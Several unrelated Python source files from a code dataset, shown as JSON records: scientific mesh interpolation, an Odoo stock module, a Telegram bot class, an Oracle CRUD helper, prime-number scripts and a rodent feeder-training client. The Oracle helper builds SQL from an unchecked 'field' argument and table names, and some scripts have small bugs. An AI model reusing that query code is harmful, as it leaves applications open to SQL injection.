   total_num_values = num_Xe * num_elem_values\n        values = np.zeros((num_Xe, num_elem_values, dimension))\n        xi = np.zeros((num_Xe, num_elem_values, dimension))\n        elements = np.zeros((num_Xe, num_elem_values, 1))\n\n        for elem_idx, element_id in enumerate(element_ids):\n            for point_idx in range(num_elem_values):\n                single_xi = XiNd[point_idx,:]\n                values[elem_idx, point_idx, :] = field.ParameterSetInterpolateSingleXiDP(iron.FieldVariableTypes.U,\n                    iron.FieldParameterSetTypes.VALUES, derivative_number, element_id, single_xi, dimension)\n            xi[elem_idx, :, :] = XiNd\n            elements[elem_idx, :] = element_id\n\n        values = np.reshape(values, (total_num_values, dimension))\n        xi = np.reshape(xi, (total_num_values, dimension))\n        elements = np.reshape(elements, (total_num_values))\n        return values, xi, elements\n    else:\n        num_values = xi.shape[0]\n        values = np.zeros((num_values, dimension))\n        for point_idx in range(xi.shape[0]):\n            element_id = elems[point_idx]\n            single_xi = xi[point_idx,:]\n            values[point_idx, :] = field.ParameterSetInterpolateSingleXiDP(iron.FieldVariableTypes.U,\n                iron.FieldParameterSetTypes.VALUES, derivative_number, int(element_id), single_xi, dimension)\n        return values","sub_path":"mesh_tools/opencmiss_fields.py","file_name":"opencmiss_fields.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"2212515","text":"import logging\n\nfrom odoo import api, fields, models, _\n\n_logger = logging.getLogger(__name__)\n\n\nclass StockLocation(models.Model):\n    _inherit = 'stock.location'\n\n    ###############################\n    # FIELDS\n    ###############################\n    ignore_compute_on_hand = 
fields.Boolean(_('Ignore To Compute Product Qty'), default=False)\n\n ###############################\n # HELPER FUNCTIONS\n ###############################\n def get_all_locations_of_warehouse(self, warehouse_id, company_id, is_excluded_location=True):\n result = []\n StockWarehouse = self.env['stock.warehouse']\n StockLocation = self.env['stock.location']\n Product = self.env['product.product']\n\n location_ids = [w.view_location_id.id for w in StockWarehouse.browse([warehouse_id])]\n if location_ids:\n # get all locations of selected warehouse\n domain_quant_loc, _, _ = Product._get_domain_locations_new(\n location_ids=location_ids, company_id=company_id, compute_child=True)\n\n all_locations_in_warehouse = StockLocation.search(domain_quant_loc).ids\n if is_excluded_location is True:\n excluded_location_ids = self.get_excluded_locations()\n result = list(set(all_locations_in_warehouse) - set(excluded_location_ids))\n else:\n result = all_locations_in_warehouse\n\n return result\n\n def get_excluded_locations(self):\n result = self.search([('ignore_compute_on_hand', '=', True)]).ids\n return result\n","sub_path":"SI/si_core/models/inherit_stock_location.py","file_name":"inherit_stock_location.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"249661851","text":"import asyncio\nfrom typing import NamedTuple\nfrom urllib.parse import urlencode\nfrom urllib.request import Request, urlopen\n\nfrom ._utils.case_insensitive_dict import CaseInsensitiveDict\n\n\nclass BotRequest(NamedTuple):\n endpoint: str\n method: str = 'GET'\n params: dict = {}\n data: bytes = None\n headers: CaseInsensitiveDict = CaseInsensitiveDict()\n\n\nclass Bot:\n update_types = [\n ('message', 'message'),\n ('edited_message', 'message'),\n ('channel_post', 'message'),\n ('edited_channel_post', 'message'),\n ('inline_query', 'inline_query'),\n ('chosen_inline_result', 'chosen_inline_result'),\n ('callback_query', 'callback_query'),\n ('shipping_query', 'shipping_query'),\n ('pre_checkout_query', 'pre_checkout_query')\n ]\n\n # optional features\n check_update = None\n\n def __init__(self, token, loop=None):\n \"\"\"\n The Class(TM).\n\n :param token: The Telegram-given token\n :param loop: The loop the bot is run into (if it's not asyncio.get_event_loop())\n \"\"\"\n\n self.token = token\n\n if loop is None:\n self.loop = asyncio.get_event_loop()\n else:\n self.loop = loop\n\n self.triggers = []\n self.update_queue = asyncio.PriorityQueue(loop=self.loop)\n self.base_url = f'https://api.telegram.org:443/bot{token}/'\n\n async def api_request(self, request: BotRequest):\n \"\"\"\n Makes a Telegram request with the params given in the BotRequest\n\n :param request: A BotRequest\n :return: The response from the server\n \"\"\"\n\n endpoint = request.endpoint\n params = request.params\n data = request.data\n headers = request.headers\n\n if params:\n url = f'{self.base_url}{endpoint}?{urlencode(params)}'\n else:\n url = f'{self.base_url}{endpoint}'\n\n if data and 'content-length' not in headers:\n headers['content-length'] = len(data)\n\n req = Request(url=url, method=request.method, data=data, headers=headers)\n res = await self.loop.run_in_executor(None, urlopen, req)\n return res\n\n def get_type_and_flavor(self, update):\n for _type, flavor in self.update_types:\n if _type in update:\n update['_type'] = _type\n update['_flavor'] = flavor\n return\n else:\n update['_type'] = None\n update['_flavor'] = None\n\n async def 
start(self):\n \"\"\"Main loop\"\"\"\n\n while True:\n _, update = await self.update_queue.get()\n self.loop.create_task(self.__handle_update(update))\n\n async def __handle_update(self, update):\n # check the update if the function is implemented and skip if it's not passed\n # note that while the function is called check_update it's basically a pre-processing hook, so if you have to\n # call get_type_and_flavor do it here\n check_update = self.check_update\n if check_update:\n is_check_passed = await check_update(update, self)\n if is_check_passed is not True:\n return\n\n for trigger in self.triggers:\n is_update_matched = await trigger.match(update, self)\n if is_update_matched is True:\n return await trigger.handle(update, self)\n\n def push_update(self, update):\n \"\"\"\n Pushes an update (already json decoded) into the queue.\n\n :param update: The update to be pushed in the queue\n \"\"\"\n\n self.update_queue.put_nowait((update['update_id'], update))\n\n def trigger(self, trigger):\n \"\"\"\n Decorates a Trigger, inserting it into the bot check list\n \"\"\"\n\n # maybe trigger may already be instances? Or we can call the methods directly?\n # or use factory methods\n self.triggers.append(trigger)\n return trigger\n","sub_path":"ubot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"179608502","text":"import ujson\nfrom datetime import datetime, date\n\nimport cx_Oracle\n\nfrom controller.utils.db_conection.oracle_db.pool import create_pool\n\nimport logging.config\n\nlog = logging.getLogger(__name__)\n\napp = None\n\ncx_Oracle.__future__.dml_ret_array_val = True\n\nasync def create_pools(loop, **DB_CONFIG):\n pool = await create_pool(**DB_CONFIG, loop=loop)\n return pool\n\nasync def get_check_acl(acl,pool,method,name):\n data = await get_items(pool, 'acl_white', {\"method\": method, \"name\": name})\n for i in data:\n if acl.get(i.get(\"name\")):\n acl[i.get(\"name\")][i.get(\"method\")] = set(i.get(\"rolename\"))\n else:\n acl[i.get(\"name\")] = {i.get(\"method\"): {}}\n acl[i.get(\"name\")][i.get(\"method\")] = set(i.get(\"rolename\"))\n return acl\n\nasync def get_all_tables(pool, **DB_CONFIG):\n async with await pool.acquire() as connection:\n tables = {}\n async with await connection.cursor() as cur:\n await cur.execute(\"\"\"SELECT object_name,object_type FROM user_objects WHERE object_type IN ('TABLE','VIEW')\"\"\")\n\n r = await cur.fetchall()\n tables.update({x[0].lower(): x[1].lower() for x in r})\n return tables\n\ndef _fix_types(record, attributes):\n d = {}\n for i in record:\n if attributes.get(i) == 'timestamp':\n if record[i]:\n d[i] = record[i].strftime(\"%Y-%m-%d %H:%M:%S\")\n elif record[i] and attributes.get(i) == 'clob':\n d[i] = ujson.loads(record[i].read())\n else:\n d[i] = record[i]\n return d\n\n\ndef _prepare_vaules(stmt, args_db):\n values = []\n for i, params in enumerate(stmt.get_parameters()):\n log.info(f\"trump:{params.name}\")\n if params.name.startswith('int') and params.kind == 'array':\n values.append([int(x) for x in args_db[i]])\n elif params.name.startswith('int') and params.kind != 'array':\n values.append(int(args_db[i]))\n elif params.name == 'timestamptz' or params.name == 'timestamp' or params.name == 'date':\n n = args_db[i].count(':')\n fmt = \"%Y-%m-%d\"\n if n == 1:\n fmt = \"%Y-%m-%d %H:%M\"\n elif n == 2:\n fmt = \"%Y-%m-%d %H:%M:%S\"\n values.append(datetime.strptime(args_db[i], fmt))\n elif params.name 
== 'bool':\n values.append(bool(args_db[i]))\n else:\n values.append(args_db[i])\n return values\n\n\ndef _prepare_vaules_write(attributes, key, value):\n if attributes.get(key) == 'clob':\n if type(value) != str:\n value = ujson.encode(value)\n elif attributes.get(key) == 'timestamptz' or attributes.get(key) == 'timestamp' or attributes.get(key) == 'date':\n n = value.count(':')\n fmt = \"%Y-%m-%d\"\n if n == 1:\n fmt = \"%Y-%m-%d %H:%M\"\n elif n == 2:\n fmt = \"%Y-%m-%d %H:%M:%S\"\n value = datetime.strptime(value, fmt)\n return value\n\nasync def get_items(db, table, args={}, roles=False, with_total=False, pager=False, uuid='-', uid='-'):\n async with await db.acquire() as connection:\n async with await connection.cursor() as cur:\n sql = f\"SELECT * FROM {table} WHERE rownum = 0\"\n await cur.execute(sql)\n row = await cur.fetchmany()\n where = []\n args_db = []\n total = 0\n times = []\n field = '*'\n attributes = {s[0].lower(): s[1] for s in cur.description()}\n for k,v in attributes.items():\n if attributes.get(k).__name__ == 'TIMESTAMP' or attributes.get(k).__name__ == 'date':\n times.append(k)\n for arg_key in args:\n if arg_key in attributes:\n if args.get(arg_key) is None:\n where.append(f'{arg_key} IS NULL')\n else:\n where.append(f'{arg_key} = :s')\n args_db.append(args.get(arg_key))\n\n elif arg_key.split('-')[0] in attributes:\n key, op = arg_key.split('-')\n param = f\"to_date(:s, 'YYYY-MM-DD HH24:MI:SS')\"\n if op == 'in':\n args_array = ','.join([':s' for x in args.get(arg_key).split(',')])\n where.append(f'{key} IN ({args_array})')\n args_db.extend(args.get(arg_key).split(','))\n elif op == 'nein':\n args_array = ','.join([':s' for x in args.get(arg_key).split(',')])\n where.append(f'{key} NOT IN ({args_array})')\n args_db.extend(args.get(arg_key).split(','))\n elif op == 'gt':\n if key in times:\n where.append(f\"{key} > {param}\")\n else:\n where.append(f'{key} > :s')\n args_db.append(args.get(arg_key))\n elif op == 'gte':\n if key in times:\n where.append(f\"{key} >= {param}\")\n else:\n where.append(f'{key} >= :s')\n args_db.append(args.get(arg_key))\n elif op == 'lt':\n if key in times:\n where.append(f\"{key} < {param}\")\n else:\n where.append(f'{key} < :s')\n args_db.append(args.get(arg_key))\n elif op == 'lte':\n if key in times:\n where.append(f\"{key} <= {param}\")\n else:\n where.append(f'{key} <= :s')\n args_db.append(args.get(arg_key))\n elif op == 'ne':\n if key in times:\n where.append(f\"{key} <> {param}\")\n else:\n where.append(f'{key} <> :s')\n args_db.append(args.get(arg_key))\n elif op == 'no':\n where.append(f'{key} IS NOT NULL')\n elif op == 'range':\n # '(a > 1 and a < 10)'\n _min_, _max_ = args.get(arg_key).split('|')\n if _min_:\n if key in times:\n where.append(f\"{key} >= {param}\")\n else:\n where.append(f'{key} >= :s')\n args_db.append(_min_)\n if _max_:\n if key in times:\n where.append(f\"{key} <= {param}\")\n else:\n where.append(f'{key} <= :s')\n args_db.append(_max_)\n elif op == 'overlap':\n where.append(f'dbms_lob.instr({key},:s) > 0')\n args_db.append(args.get(arg_key))\n elif op == 'like':\n where.append(f'{key} LIKE :s')\n args_db.append('%' + args.get(arg_key) + '%')\n elif op == 'like_raw':\n where.append(f'{key} LIKE :s')\n args_db.append(dict(args).get(arg_key))\n\n if attributes.get('view_roles') and roles is not False:\n roles = ''.join(roles)\n where.append(f'dbms_lob.instr(view_roles,:s) > 0')\n args_db.append(roles)\n\n where_cause = 'WHERE ' + ' AND '.join(where) if where else ''\n\n new_list = []\n if with_total:\n sql 
= f'SELECT count(*) FROM {table} {where_cause}'\n await cur.execute(sql, args_db)\n r = await cur.fetchmany()\n total = r[0][0]\n new_list = []\n columns = [i[0].lower() for i in cur.description()]\n log.info(f\"columns:{columns}\")\n lists = []\n for rows in r:\n lists.append(list(rows))\n for row in lists:\n row_dict = dict()\n for col in columns:\n row_dict[col] = row[columns.index(col)]\n new_list.append(row_dict)\n\n if args.get('field'):\n field = args.get('field')\n order = ''\n sort = args.get('sort')\n if sort:\n sort_list = sort.split(',')\n order_list = []\n for item_sort in sort_list:\n order_column = item_sort.strip('-')\n if order_column in attributes:\n order_type = 'ASC' if item_sort.startswith('-') else 'DESC'\n order_list.append(f'{order_column} {order_type}')\n if order_list:\n order_cause = ', '.join(order_list)\n order = f'ORDER by {order_cause}'\n sql = f'SELECT {field} FROM {table} {where_cause} {order}'\n\n if pager:\n page_size = args.get('pagesize') if args.get('pagesize') else 10\n try:\n page = int(args.get('page')) if args.get('page') else 0\n int(page_size)\n current_position = (page + 1) * int(page_size)\n min_position = int(current_position) - int(page_size) if args.get('page') else 0\n log.info(f\"current_position:{current_position}\")\n sql = f'SELECT {field} FROM (SELECT ROWNUM rn,e.* FROM (SELECT * FROM {table} {where_cause} {order})e ' \\\n f'WHERE ROWNUM<={current_position}) t2 WHERE t2.rn >{min_position}'\n except Exception as e:\n pass\n log.info(f\"sql===={sql} \\n args_db:{args_db}\")\n await cur.execute(sql, args_db)\n r = await cur.fetchall()\n attributes = {s[0].lower(): s[1].__name__.lower() for s in cur.description()}\n new_list = []\n columns = [i[0].lower() for i in cur.description()]\n lists = []\n for rows in r:\n lists.append(list(rows))\n for row in lists:\n row_dict = dict()\n for col in columns:\n row_dict[col] = row[columns.index(col)]\n new_list.append(row_dict)\n if with_total:\n return (total, [_fix_types(item, attributes) for item in new_list])\n else:\n return [_fix_types(item, attributes) for item in new_list]\n\nasync def get_item(db, table, oid, roles=False, column='id', uuid='-', uid='-'):\n async with await db.acquire() as connection:\n async with await connection.cursor() as cur:\n value = [oid]\n times = []\n row = []\n sql = f\"SELECT * FROM {table} WHERE rownum = 0\"\n await cur.execute(sql)\n attributes = {s[0].lower(): s[1] for s in cur.description()}\n for k,v in attributes.items():\n if attributes.get(k).__name__ == 'TIMESTAMP' or attributes.get(k).__name__ == 'date':\n times.append(k)\n if column in times:\n sql = f\"SELECT * FROM {table} WHERE {column} = to_date(:s, 'YYYY-MM-DD HH24:MI:SS')\"\n else:\n sql = f'SELECT * FROM {table} WHERE {column} = :s'\n if attributes.get('view_roles') and roles is not False:\n sql += ' AND dbms_lob.instr(view_roles,:s) > 0'\n value.append(''.join(roles))\n sql += ' AND rownum = 1'\n log.info(f\"sql===={sql} \\n value={value}\")\n await cur.execute(sql, value)\n stmt = await cur.fetchone()\n if stmt:\n columns = [i[0].lower() for i in cur.description()]\n row = list(stmt)\n row_dict = dict()\n for col in columns:\n row_dict[col] = row[columns.index(col)]\n attributes = {s[0].lower(): s[1].__name__.lower() for s in cur.description()}\n if stmt:\n return _fix_types(row_dict, attributes)\n\nasync def create_item(db, table, data, column='id', lock_table=False, uuid='-', uid='-'):\n async with await db.acquire() as connection:\n async with await connection.cursor() as cur:\n sql = 
f\"SELECT * FROM {table} WHERE rownum = 0\"\n await cur.execute(sql)\n r = await cur.fetchmany()\n attributes = {s[0].lower(): s[1].__name__.lower() for s in cur.description()}\n result = []\n keys = []\n val_col = []\n count = 0\n if type(data) == list:\n vals = []\n for item in data:\n values = {}\n count += 1\n val_col = []\n keys = []\n for key in item:\n if key not in attributes: continue\n if key not in keys:\n keys.append(key)\n value = item[key]\n if attributes.get(key) == 'clob':\n await cur.setinputsizes(**{key: cx_Oracle.CLOB})\n val_col.append(\":\" + key)\n values[key] = _prepare_vaules_write(attributes, key, value)\n if attributes.get(\"id\") == 'string':\n idVar = await cur.var(cx_Oracle.STRING, arraysize=len(data))\n elif attributes.get(\"id\") == 'number':\n idVar = await cur.var(cx_Oracle.NUMBER, arraysize=len(data))\n values[\"idVar\"] = idVar\n vals.append(values)\n val_colums = \"(\" + ','.join(val_col) + \")\"\n key_columns = ', '.join([k for k in keys])\n sql = f\"INSERT INTO {table} ({key_columns}) VALUES {val_colums}\" \\\n f\" returning {column} into :idVar\"\n log.info(f\"sql===={sql}\")\n await cur.executemany(sql, vals)\n await connection.commit()\n idlist = idVar.values\n result = [int(i) if attributes.get(\"id\") == 'number' else i for item in idlist for i in item]\n return result\n else:\n values = {}\n for key in data:\n if key not in attributes: continue\n keys.append(key)\n value = data[key]\n if attributes.get(key) == 'clob':\n await cur.setinputsizes(**{key: cx_Oracle.CLOB})\n val_col.append(\":\" + key)\n values[key] = _prepare_vaules_write(attributes, key, value)\n val_colums = \"(\" + ','.join(val_col) + \")\"\n key_columns = ', '.join([k for k in keys])\n if attributes.get(\"id\") == 'string':\n idVar = await cur.var(cx_Oracle.STRING)\n elif attributes.get(\"id\") == 'number':\n idVar = await cur.var(cx_Oracle.NUMBER)\n sql = f\"INSERT INTO {table} ({key_columns}) VALUES {val_colums} returning {column} into :idVar\"\n log.info(f\"sql===={sql}\")\n values[\"idVar\"] = idVar\n await cur.execute(sql, values)\n if attributes.get(\"id\") == 'number':\n id = int(idVar.getvalue()[0])\n else:\n id = idVar.getvalue()[0]\n await connection.commit()\n return id\n\n\nasync def modify_item(db, table, oid, data, column='id', uuid='-', uid='-'):\n async with await db.acquire() as connection:\n async with await connection.cursor() as cur:\n sql = f\"SELECT * FROM {table} WHERE rownum = 0\"\n await cur.execute(sql)\n r = await cur.fetchmany()\n attributes = {s[0].lower(): s[1].__name__.lower() for s in cur.description()}\n params = []\n values = []\n log.info(f\"data:{data}\")\n for key in data:\n if key not in attributes: continue\n params.append(f'{key} = :s')\n value = data[key]\n values.append(_prepare_vaules_write(attributes, key, value))\n\n args_array = ','.join([':s' for x in oid.split(',')])\n values.extend(oid.split(','))\n cause = ', '.join(params)\n sql = f\"UPDATE {table} SET {cause} WHERE {column} in ({args_array})\"\n log.info(f\"sql===={sql}\")\n await cur.execute(sql, values)\n result = cur.rowcount()\n await connection.commit()\n return result\n\n\n# 修改多条,data1为where条件例{'grade_id': int(params.get('grade_id'))}。data为修改内容,同modify_item\nasync def modify_items(db, table, data1, data, uuid='-', uid='-'):\n async with await db.acquire() as connection:\n async with await connection.cursor() as cur:\n sql = f\"SELECT * FROM {table} WHERE rownum = 0\"\n await cur.execute(sql)\n r = await cur.fetchmany()\n attributes = {s[0].lower(): s[1].__name__.lower() 
for s in cur.description()}\n params = []\n values = []\n column = []\n for key in data:\n if key not in attributes: continue\n params.append(f'{key} = :s')\n value = data[key]\n values.append(_prepare_vaules_write(attributes, key, value))\n for key1 in data1:\n if key1 not in attributes: continue\n column.append(f'{key1} = :s')\n value = data1[key1]\n values.append(_prepare_vaules_write(attributes, key1, value))\n cause = ', '.join(params)\n condition = ' and '.join(column)\n sql = f\"UPDATE {table} SET {cause} WHERE {condition}\"\n log.info(f\"sql===={sql}\")\n await cur.execute(sql, values)\n result = cur.rowcount()\n await connection.commit()\n return result\n\nasync def delete_item(db, table, oid, column='id', uuid='-', uid='-'):\n async with await db.acquire() as conn:\n async with await conn.cursor() as cur:\n oids = []\n args_array = ','.join([':s' for x in oid.split(',')])\n oids.extend(oid.split(','))\n sql = f\"DELETE FROM {table} WHERE {column} in ({args_array})\"\n await cur.execute(sql, oids)\n await conn.commit()\n return True\n\nasync def query(pool, sql, *args, fetch_type = 'fetch', uuid='-', uid='-'):\n async with await pool.acquire() as connection:\n async with await connection.cursor() as cur:\n log.info(f\"sql===={sql} \\n args:{args}\")\n await cur.execute(sql,(*args,))\n attributes = {s[0].lower(): s[1].__name__.lower() for s in cur.description()}\n columns = [i[0].lower() for i in cur.description()]\n lists = []\n new_list = []\n if fetch_type == 'fetch':\n result = await cur.fetchall()\n for rows in result:\n lists.append(list(rows))\n for row in lists:\n row_dict = dict()\n for col in columns:\n row_dict[col] = row[columns.index(col)]\n new_list.append(row_dict)\n return [_fix_types(item, attributes) for item in new_list]\n elif fetch_type == 'fetchrow':\n result = await cur.fetchone()\n row_dict = dict()\n if result:\n lists.append(list(result))\n for row in lists:\n for col in columns:\n row_dict[col] = row[columns.index(col)]\n return _fix_types(row_dict, attributes)\n elif fetch_type == 'fetchval':\n result = await cur.fetchone()\n if result:\n result = result[0]\n if type(result) == datetime:\n return result.strftime(\"%Y-%m-%d %H:%M:%S\")\n return result\n elif fetch_type == 'attributes':\n return {s[0].lower(): s[1].__name__.lower() for s in cur.description()}\n\n# async def execute(pool, sql, *args, table, uuid='-', uid='-'):\n# async with pool.acquire() as connection:\n# statement = await connection.prepare(sql.format(*range(1, sql.count('{}')+1)))\n# updestmt = await connection.prepare(\"SELECT * FROM %s\"%(table))\n# attributes = {s[0]: s[1][1] for s in updestmt.get_attributes()}\n# values = _prepare_vaules(updestmt, args)\n# log.debug(f\"{uuid} {uid} arg:{args}\\nsql:{sql}\\nval:{values}\")\n# result = await connection.fetch(sql, *values)\n\nasync def execute(pool, sql, *args, uuid='-', uid='-'):\n log.info(f\"sql===={sql} \\n args:{args}\")\n async with pool.acquire() as conn:\n async with await conn.cursor() as cur:\n await cur.execute(sql, (*args,))\n await conn.commit()\n\n","sub_path":"common_interface/controller/utils/db_conection/oracle_db/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":21438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"104767043","text":"numb = int(input('Enter a number: '))\r\nprime = True\r\n\r\nfor b in range( 2 , numb ):\r\n if (numb % b == 0):\r\n prime = False\r\n break\r\nif prime:\r\n print('This is a Prime Number')\r\nelse:\r\n print('This 
is not a Prime Number')\r\n\r\n\r\n# Second Method\r\n\r\nn = int(input(\"Enter the number: \"))\r\nis_prime = n > 1\r\nfor i in range( 2 , n ):\r\n    if(n % i == 0):\r\n        is_prime = False\r\n        break\r\nif is_prime:\r\n    print(\"Its prime\")\r\nelse:\r\n    print('Its not prime')\r\n\r\nprint(\"Done\")\r\n\r\n","sub_path":"28_prime_number.py","file_name":"28_prime_number.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}\n+{"seq_id":"38624832","text":"#!/usr/bin/python3.6\r\n# This client is for training animals to eat from the feeder. \r\n# Sessions last 60 min\r\n# Trials consist of: tray light turns on \r\n#\t\t\t\t\tafter 500ms, 4 pellets drop\r\n#\t\t\t\t\tafter 5s tray light goes off\r\n#\t\t\t\t\tITI: VI m=30s sd=2.5s\r\nimport asyncio\r\nimport random\r\nimport time\r\nfrom whisker_conn import WhiskerConnector\r\n\r\nport = 3233\r\n\r\n\r\nclass WhiskerClient:\r\n\tdef __init__(self, loop, host, port):\r\n\t\tself.loop = loop\r\n\t\tself.host = host\r\n\t\tself.port = port\r\n\t\tself.main_conn = WhiskerConnector()\r\n\t\tself.imm_conn = None\r\n\t\tself.imm_port = None\r\n\t\tself.imm_code = None\r\n\t\tself.imm_conn_future = asyncio.Future()\r\n\t\tself.imm_reply_future = None\r\n\t\tself.screen_active = True\r\n\t\tself.expt_active = True\r\n\t\r\n\t@asyncio.coroutine\r\n\tdef connect(self):\r\n\t\tself.main_conn.add_handler('*', self.handle_main_all)\r\n\t\tself.main_conn.add_handler('ImmPort:', self.handle_Imm)\r\n\t\tself.main_conn.add_handler('Code:', self.handle_Code)\r\n\t\tself.main_conn.add_handler('Event:', self.handle_Event)\r\n\t\tprint(\"Connecting to Whisker Server at {}:{}\".format(self.host, self.port))\r\n\t\tyield from self.main_conn.connect(self.loop, 'localhost', self.port)\r\n\t\tyield from self.imm_conn_future\r\n\r\n\tdef handle_main_all(self, m):\r\n\t\tif m is None:\r\n\t\t\tself.loop.stop()\r\n\t\t\tprint(\"Server disconnected. 
Exiting.\")\r\n\t\telse:\r\n\t\t\tprint(\"Main: '\" + \" \".join(m) + \"'\")\r\n\t\r\n\tdef handle_reply(self, m):\r\n\t\tif m is not None:\r\n\t\t\tself.imm_reply_future.set_result(m)\r\n\r\n\tdef handle_Imm(self, m):\r\n\t\tself.imm_port = int(m[1])\r\n\r\n\t@asyncio.coroutine\r\n\tdef send_message(self, *m):\r\n\t\tif self.imm_reply_future is not None: yield from self.imm_reply_future\r\n\t\tself.imm_reply_future = asyncio.Future()\r\n\t\tprint(\"Sent: '\" + \" \".join(m) + \"'\")\r\n\t\tself.imm_conn.send_message(m)\r\n\t\tresult = yield from self.imm_reply_future\r\n\t\tself.imm_reply_future = None\r\n\t\tprint(\"Reply: '\" + \" \".join(result) + \"'\")\r\n\t\treturn result\r\n\r\n\t@asyncio.coroutine\r\n\tdef handle_Code(self, m):\r\n\t\tself.imm_code = m[1]\r\n\t\tself.imm_conn = WhiskerConnector()\r\n\t\tself.imm_conn.add_handler('*', self.handle_reply)\r\n\t\tprint(self.imm_port)\r\n\t\tyield from self.imm_conn.connect(self.loop, 'localhost', self.imm_port)\r\n\t\tyield from self.send_message('Link', self.imm_code)\r\n\t\tprint(\"Connecting to immediate channel {}:{} with code {}\".format(self.host, self.imm_port, self.imm_code))\r\n\t\tself.imm_conn_future.set_result(True)\r\n#________________________________________________________________________________________________\r\n\r\n\t@asyncio.coroutine\r\n\tdef handle_Event(self, m):\r\n\t\tmessage = m[1]\r\n\t\tif message == 'iti_end':\r\n\t\t\tprint('ITI over')\r\n\t\t\tyield from self.feed(2)\t\t\t\r\n\t\t\r\n\t\telif message == 'iti_start':\r\n\t\t\tprint('iti starting')\r\n\t\t\tyield from self.iti()\r\n\t\t\t\t\t\r\n\t\telif message == 'end':\r\n\t\t#when experiment timer finished, end experiment\r\n\t\t\tself.expt_active = False\r\n\t\t\tself.screen_active = False\r\n\t\t\tyield from client.send_message('TimerClearAllEvents')\r\n\t\t\tyield from client.send_message('DisplayAddObject', 'document', 'done', 'text', '50', '50', 'All Done', '-textcolour', '255', '255', '255')\r\n\t\t\tprint('experiment is over')\r\n\t\tpass\r\n\r\n#________________________________________________________________________________________________\r\n\t@asyncio.coroutine\r\n\tdef iti(self):\r\n\t\titi = random.gauss(30, 2.5)\r\n\t\twhile iti<20 or iti>40 : \r\n\t\t\titi = random.gauss(30, 2.5)\r\n\t\t\tpass\r\n\t\tprint(int(iti))\r\n\t\ttime.sleep(iti)\r\n\t\tyield from client.send_message('TimerSetEvent', '0', '0', 'iti_end')\r\n#________________________________________________________________________________________________\r\n\t@asyncio.coroutine\r\n\tdef feed(self, n):\r\n\t\tyield from client.send_message('LineSetState', 'TrayLight', 'on')\r\n\t\ttime.sleep(1)\r\n\t\tfor x in range(0,n):\r\n\t\t\tyield from client.send_message('LineSetState', 'PelletDispenser', 'on')\r\n\t\t\ttime.sleep(0.5)\r\n\t\t\tyield from client.send_message('LineSetState', 'PelletDispenser', 'off')\r\n\t\t\ttime.sleep(0.5)\r\n\t\t\tpass\r\n\t\ttime.sleep(5)\r\n\t\tyield from client.send_message('LineSetState', 'TrayLight', 'off')\r\n\t\tyield from client.send_message('TimerSetEvent', '0', '0', 'iti_start')\r\n#________________________________________________________________________________________________\r\n\r\n\t@asyncio.coroutine\r\n\tdef start_Expt(self):\r\n\t\t#Start experiment timer\r\n\t\tyield from client.send_message('TimerSetEvent', '3600000', '0', 'end')\r\n\t\tprint('I started the experiment')\r\n\t\t#send message to start iti\r\n\t\tyield from client.send_message('TimerSetEvent', '0', '0', 
'iti_start')\r\n\r\n#________________________________________________________________________________________________\r\n\r\nevent_loop = asyncio.get_event_loop()\r\nclient = WhiskerClient(event_loop, 'localhost', port)\r\n\r\n@asyncio.coroutine\r\ndef run():\r\n\t#claim lines - houselight, tray light, pellet dispenser, white noise\r\n\tyield from client.send_message('LineClaim', '56', '-alias', 'HouseLight')\r\n\tyield from client.send_message('LineClaim', '57', '-alias', 'TrayLight')\r\n\tyield from client.send_message('LineClaim', '58', '-alias', 'PelletDispenser')\r\n\tyield from client.send_message('LineClaim', '59', '-alias', 'WhiteNoise')\r\n\t#Group feeder and tray\r\n\tyield from client.send_message('LineSetAlias', 'PelletDispenser', 'Feeder')\r\n\tyield from client.send_message('LineSetAlias', 'TrayLight', 'Feeder')\r\n\t#Initial states - House light on, traylight off, white noise on \r\n\tyield from client.send_message('LineSetState', 'HouseLight', 'on')\r\n\tyield from client.send_message('LineSetState', 'Feeder', 'off')\r\n\tyield from client.send_message('LineSetState', 'WhiteNoise', 'off') #***TURN ON****\r\n\t#Set up display \r\n\tyield from client.send_message('DisplayClaim', '3', '-alias', 'screen')\r\n\tyield from client.send_message('DisplayCreateDocument', 'document')\r\n\tyield from client.send_message('DisplayShowDocument', 'screen', 'document')\r\n\t#draw background/mask\r\n\tyield from client.send_message('DisplayAddObject', 'document', 'mask', 'rectangle', '10', '10', '758', '1014', '-brushsolid', '0', '0', '0')\r\n\t#start experiment\r\n\tyield from client.start_Expt()\r\n\r\nevent_loop.run_until_complete(client.connect())\r\nprint('here')\r\nevent_loop.run_until_complete(run())\r\n\r\ntry:\r\n\tevent_loop.run_forever()\r\nexcept KeyboardInterrupt as e:\r\n\tprint(\" Received Ctrl-C. 
Exiting.\")\r\n\r\n\r\n","sub_path":"whisker_client_feeder_R4.py","file_name":"whisker_client_feeder_R4.py","file_ext":"py","file_size_in_byte":6187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"174214507","text":"#Kaggle competition\n# THE ACTUAL VIRTUAL.ENV WILL BE USED FOR OTHER DS/AI PROJECT\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.python.keras.preprocessing.sequence import pad_sequences\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\ndata=pd.read_json(\"all/train.json\")\ndata.columns\n\naudios=[k for k in data['audio_embedding']]\nY=np.asanyarray(data['is_turkey'])\n\n\ndef split(data):\n train,test=train_test_split(data,test_size=0.3)\n\n Train_audios = [k for k in train['audio_embedding']]\n Train_Y = np.asanyarray(train['is_turkey'])\n\n Test_audios = [k for k in test['audio_embedding']]\n Test_Y = np.asanyarray(test['is_turkey'])\n\n # CORRECT SHAPE OF AUDIOS\n Train_audios = pad_sequences(Train_audios, maxlen=10)\n Test_audios = pad_sequences(Test_audios, maxlen=10)\n\n # NORMALIZATION\n Train_audios = tf.keras.utils.normalize(Train_audios)\n Test_audios = 